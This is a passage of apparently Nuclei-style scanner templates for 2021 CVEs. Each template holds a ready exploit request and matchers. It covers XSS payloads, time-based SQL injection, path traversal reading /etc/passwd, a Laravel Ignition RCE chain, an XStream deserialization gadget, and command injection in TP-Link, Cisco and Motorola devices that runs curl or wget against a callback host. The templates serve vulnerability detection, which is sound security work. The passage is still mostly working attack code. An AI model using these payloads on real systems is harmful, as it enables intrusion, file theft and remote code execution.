application/x-www-form-urlencoded\n\nsettingsform[newpassword2]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25033","info":{"name":"Noptin < 1.6.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-31250","info":{"name":"CHIYU TCP/IP Converter - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY"],"headers":{"Authorization":"Basic OmFkbWlu"},"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["\"><script>alert({{randstr}})</script>"]}]}]},{"id":"CVE-2021-41653","info":{"name":"TP-Link - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi?2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain\nReferer: http://{{Hostname}}/mainFrame.htm\nCookie: Authorization=Basic YWRtaW46YWRtaW4=\n\n[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\ndataBlockSize=64\ntimeout=1\nnumberOfRepetitions=4\nhost=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}')\nX_TP_ConnName=ewan_ipoe_d\ndiagnosticsState=Requested\n","POST /cgi?7 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain\nReferer: http://{{Hostname}}/mainFrame.htm\nCookie: Authorization=Basic YWRtaW46YWRtaW4=\n\n[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-45968","info":{"name":"Pascom CPS  - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /services/pluginscript/ HTTP/1.1\nHost: {{Hostname}}\n","GET /services/pluginscript/..;/..;/ HTTP/1.1\nHost: {{Hostname}}\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_2 != status_code_1","contains(body_2, 'pascom GmbH & Co KG') || contains(body_3, 'pascom GmbH & Co KG')"],"condition":"and"}]}]},{"id":"CVE-2021-24746","info":{"name":"WordPress Sassy Social Share Plugin <3.3.40 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/posts","{{BaseURL}}/{{slug}}/?a&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["?a\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"slug","group":1,"regex":["\"slug\":\"([_a-z-A-Z0-9]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-40856","info":{"name":"Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /about/../tree?action=get HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"TYPE\"","\"ITEMS\"","\"COUNT\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21745","info":{"name":"ZTE MF971R - Referer authentication bypass","severity":"medium"},"requests":[{"raw":["GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1\nHost: {{Hostname}}\nReferer: http://interact.sh/127.0.0.1.html\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["psw_fail_num_str\":\"[0-9]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-1472","info":{"name":"Cisco Small Business RV Series - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nCookie: sessionid='`wget http://{{interactsh-url}}`'\nAuthorization: QUt6NkpTeTE6dmk4cW8=\nContent-Type: multipart/form-data; boundary=---------------------------392306610282184777655655237536\n\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"option\"\n\n5NW9Cw1J\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"destination\"\n\nJ0I5k131j2Ku\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"file.path\"\n\nEKsmqqg0\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"file\"; filename=\"config.xml\"\nContent-Type: application/xml\n\nqJ57CM9\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"filename\"\n\nJbYXJR74n.xml\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"GXbLINHYkFI\"\n\n<input><fileType>configuration</fileType><source><location-url>FILE://Configuration/config.xml</location-url></source><destination><config-type>config-running</config-type></destination></input>\n-----------------------------392306610282184777655655237536--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["\"jsonrpc\":"]}]}]},{"id":"CVE-2021-21287","info":{"name":"MinIO Browser API - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /minio/webrpc HTTP/1.1\nHost: {{interactsh-url}}\nContent-Type: application/json\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36\nContent-Length: 76\n\n{\"id\":1,\"jsonrpc\":\"2.0\",\"params\":{\"token\":  \"Test\"},\"method\":\"web.LoginSTS\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["We encountered an internal error"]}]}]},{"id":"CVE-2021-39322","info":{"name":"WordPress Easy Social Icons Plugin < 3.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php/</script><script>alert(document.domain)</script>/?page=cnss_social_icon_page HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40323","info":{"name":"Cobbler <3.3.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>find_profile</methodName>\n  <params>\n    <param>\n      <value>\n        <struct>\n          <member>\n            <name>name</name>\n            <value>\n              <string>*</string>\n            </value>\n          </member>\n        </struct>\n      </value>\n    </param>\n  </params>\n</methodCall>\n","POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>generate_script</methodName>\n  <params>\n    <param>\n      <value>\n        <string>{{profile}}</string>\n      </value>\n    </param>\n    <param>\n      <value>\n        <string></string>\n      </value>\n    </param>\n    <param>\n      <value>\n        <string>/etc/passwd</string>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/xml"]},{"type":"regex","regex":["root:.*:0","bin:.*:1","nobody:.*:99"],"condition":"or"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"profile","group":1,"regex":["<value><string>(.*?)</string></value>"],"internal":true}]}]},{"id":"CVE-2021-43734","info":{"name":"kkFileview v4.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd","{{BaseURL}}/getCorsFile?urlPath=file:///c://windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41293","info":{"name":"ECOA Building Automation System - Arbitrary File Retrieval","severity":"high"},"requests":[{"raw":["POST /viewlog.jsp HTTP/1.1\nHost: {{Hostname}}\n\nyr=2021&mh=6&fname=../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33044","info":{"name":"Dahua IPC/VTH/VTO - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /RPC2_Login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nConnection: close\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n{\"id\": 1, \"method\": \"global.login\", \"params\": {\"authorityType\": \"Default\", \"clientType\": \"NetKeyboard\", \"loginType\": \"Direct\", \"password\": \"Not Used\", \"passwordType\": \"Default\", \"userName\": \"admin\"}, \"session\": 0}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\":true","id","params","session"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[",\"result\":true,\"session\":\"([a-z]+)\"\\}"],"part":"body"}]}]},{"id":"CVE-2021-3577","info":{"name":"Motorola Baby Monitors - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /?action=command&command=set_city_timezone&value=$(wget%20http://{{interactsh-url}})) HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["set_city_timezone"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28164","info":{"name":"Eclipse Jetty - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45043","info":{"name":"HD-Network Realtime Monitoring System 2.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /language/lang HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\nCookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype=\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24298","info":{"name":"WordPress Simple Giveaways <2.36.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26702","info":{"name":"EPrints 3.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42627","info":{"name":"D-Link DIR-615 - Unauthorized Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wan.htm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["src='menu.js?v=\"+Math.random()+\"'></scr\"+\"ipt>\");","var ipv6conntype"],"condition":"and"},{"type":"word","part":"header","words":["Virtual Web"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31682","info":{"name":"WebCTRL OEM <= 6.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>","common/lvl5"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24435","info":{"name":"WordPress Titan Framework plugin <= 1.12.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=%27/onerror=%27alert(document.domain)%27/b=%27","{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20onerror=alert(document.domain)%20b=%27","{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20accesskey=%27x%27%20onclick=%27alert(document.domain)%27%20class=%27"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","regex":["(?i)(onerror=|onclick=)['\"]?alert\\(document\\.domain\\)['\"]?","<p>Grumpy wizards make"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24495","info":{"name":"Wordpress Marmoset Viewer <1.9.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%27{{randstr}}%27)>","{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><svg/onload=alert('{{randstr}}')>","alert(/{{randstr}}/)"],"condition":"or"},{"type":"word","words":["Marmoset Viewer"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42566","info":{"name":"myfactory FMS  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26475","info":{"name":"EPrints 3.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</title><script>alert('{{randstr}}')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24436","info":{"name":"WordPress W3 Total Cache <2.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=w3tc_extensions&extension=\"%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, '><script>alert(document.domain)</script>&action=view')","contains(header_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2021-24931","info":{"name":"WordPress Secure Copy Content Protection and Content Locking <2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{\\\"status\\\":true\")"],"condition":"and"}]}]},{"id":"CVE-2021-43062","info":{"name":"Fortinet FortiMail 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com<Svg%2Fonload%3Dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<Svg/onload=alert(document.domain)>","FortiMail Click Protection"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27909","info":{"name":"Mautic <3.3.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/passwordreset?bundle=';alert(document.domain);var+ok='"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'';alert(document.domain);var ok='","mauticBasePath"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24731","info":{"name":"Pie Register < 3.7.1.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-json/pie/v1/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nuser_login='+AND+(SELECT+8149+FROM+(SELECT(SLEEP(3)))NuqO)+AND+'YvuB'='YvuB&login_pass=a\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"User credentials are invalid.\")"],"condition":"and"}]}]},{"id":"CVE-2021-3129","info":{"name":"Laravel with Ignition <= v8.4.2 Debug Mode - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"AA\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"phar://../storage/logs/laravel.log/test.txt\"}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups=","Illuminate"],"condition":"and"},{"type":"status","status":[500]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-21351","info":{"name":"XStream <1.4.16 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>ysomap</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>\n      <m__DTMXRTreeFrag>\n        <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>\n          <m__size>-10086</m__size>\n          <m__mgrDefault>\n            <__overrideDefaultParser>false</__overrideDefaultParser>\n            <m__incremental>false</m__incremental>\n            <m__source__location>false</m__source__location>\n            <m__dtms>\n              <null/>\n            </m__dtms>\n            <m__defaultHandler/>\n          </m__mgrDefault>\n          <m__shouldStripWS>false</m__shouldStripWS>\n          <m__indexing>false</m__indexing>\n          <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>\n            <fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>\n              <javax.sql.rowset.BaseRowSet>\n                <default>\n                  <concurrency>1008</concurrency>\n                  <escapeProcessing>true</escapeProcessing>\n                  <fetchDir>1000</fetchDir>\n                  <fetchSize>0</fetchSize>\n                  <isolation>2</isolation>\n                  <maxFieldSize>0</maxFieldSize>\n                  <maxRows>0</maxRows>\n                  <queryTimeout>0</queryTimeout>\n                  <readOnly>true</readOnly>\n                  <rowSetType>1004</rowSetType>\n                  <showDeleted>false</showDeleted>\n                  <dataSource>rmi://{{interactsh-url}}/test</dataSource>\n                  <listeners/>\n                  <params/>\n                </default>\n              </javax.sql.rowset.BaseRowSet>\n              <com.sun.rowset.JdbcRowSetImpl>\n                <default/>\n              </com.sun.rowset.JdbcRowSetImpl>\n            </fPullParserConfig>\n            <fConfigSetInput>\n              <class>com.sun.rowset.JdbcRowSetImpl</class>\n              <name>setAutoCommit</name>\n              <parameter-types>\n                <class>boolean</class>\n              </parameter-types>\n            </fConfigSetInput>\n            <fConfigParse reference='../fConfigSetInput'/>\n            <fParseInProgress>false</fParseInProgress>\n          </m__incrementalSAXSource>\n          <m__walker>\n            <nextIsRaw>false</nextIsRaw>\n          </m__walker>\n          <m__endDocumentOccured>false</m__endDocumentOccured>\n          <m__idAttributes/>\n          <m__textPendingStart>-1</m__textPendingStart>\n          <m__useSourceLocationProperty>false</m__useSourceLocationProperty>\n          <m__pastFirstElement>false</m__pastFirstElement>\n        </m__dtm>\n        <m__dtmIdentity>1</m__dtmIdentity>\n      </m__DTMXRTreeFrag>\n      <m__dtmRoot>1</m__dtmRoot>\n      <m__allowRelease>false</m__allowRelease>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>ysomap</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n      <m__obj class='string'>test</m__obj>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-32789","info":{"name":"WooCommerce Blocks 2.5 to 5.5 - Unauthenticated SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500"],"matchers-condition":"and","matchers":[{"type":"word","words":["sqli-test","attribute_counts","price_range","term"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28918","info":{"name":"Netmask NPM Package - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url=http://0177.0.0.1/server-status","{{BaseURL}}/?host=http://0177.0.0.1/server-status","{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["Apache Server Status","Server 